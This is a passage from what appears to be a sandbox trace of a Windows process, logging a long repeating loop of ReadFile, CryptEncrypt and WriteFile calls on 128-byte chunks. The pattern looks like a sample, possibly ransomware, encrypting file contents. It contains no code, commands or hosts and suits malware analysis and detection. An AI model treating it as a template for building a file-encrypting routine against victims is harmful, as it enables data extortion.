pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.289] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.289] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.290] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.294] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.294] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.294] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.294] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.294] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.294] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.294] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.294] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.294] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.294] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.294] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.295] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.295] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.296] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.296] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.296] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.296] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.296] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.296] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.296] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.296] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.296] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.297] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.297] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.298] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.298] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.298] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.299] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, 